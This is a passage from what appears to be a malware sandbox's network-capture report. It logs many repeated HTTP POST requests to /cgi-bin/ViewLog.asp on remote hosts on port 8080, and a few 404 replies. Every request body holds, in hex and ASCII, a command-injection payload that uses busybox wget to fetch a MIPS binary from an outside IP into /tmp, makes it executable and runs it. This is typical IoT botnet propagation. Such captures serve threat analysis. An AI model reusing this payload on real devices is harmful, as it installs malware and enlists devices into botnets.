                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:51.078560114 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:59.782764912 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:17.446490049 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:52.262419939 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              155192.168.2.134015631.136.66.1518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:42.872355938 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:43.430695057 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:44.550604105 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:46.982640982 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:51.590584993 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:00.550672054 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:19.494582891 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:56.358442068 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              156192.168.2.134034094.74.118.1818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:42.928636074 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              157192.168.2.135958262.29.11.628080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:42.937422991 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              158192.168.2.134046894.122.9.1358080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:42.940035105 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              159192.168.2.134566262.30.121.998080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:43.041558027 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:43.290894985 CET755INHTTP/1.0 404 Not Found !!!
                                              Pragma: no-cache
                                              Content-type: text/html
                                              WWW-Authenticate: /cgi-bin/ViewLog.asp
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 21 21 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 63 65 6e 74 65 72 3e 0a 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 31 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 67 63 6f 6c 6f 72 3d 22 23 30 30 30 30 41 30 22 3e 0a 20 20 20 20 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 66 61 63 65 3d 22 41 72 69 61 6c 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 21 21 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 67 63 6f 6c 6f 72 3d 22 23 46 33 46 33 46 33 22 20 62 6f 72 64 65 72 63 6f 6c 6f 72 3d 22 23 30 30 30 30 38 30 22 20 62 6f 72 64 65 72 63 6f 6c 6f 72 64 61 72 6b 3d 22 23 30 30 30 30 38 30 22 3e 0a 20 20 20 20 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 54 69 6d 65 73 20 4e 65 77 20 52 6f 6d 61 69 6e 22 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              160192.168.2.135105694.120.155.988080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:43.042059898 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              161192.168.2.134202431.43.191.28080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:46.593041897 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:46.777436018 CET368INHTTP/1.1 404 Not Found
                                              Server: openresty
                                              Date: Thu, 23 Nov 2023 04:15:48 GMT
                                              Content-Type: text/html
                                              Content-Length: 150
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              162192.168.2.135746262.63.249.1808080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:46.603634119 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:46.822274923 CET354INHTTP/1.0 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:15:46 GMT
                                              Connection: close
                                              Content-Type: text/html; charset=ISO-8859-1
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              163192.168.2.135045495.217.11.1118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:46.604919910 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:46.803067923 CET212INHTTP/1.1 404 Not Found
                                              Content-Type: text/plain
                                              Date: Thu, 23 Nov 2023 04:15:46 GMT
                                              Content-Length: 18
                                              Connection: close
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                              Data Ascii: 404 page not found


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              164192.168.2.133469494.121.69.1168080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:46.635441065 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
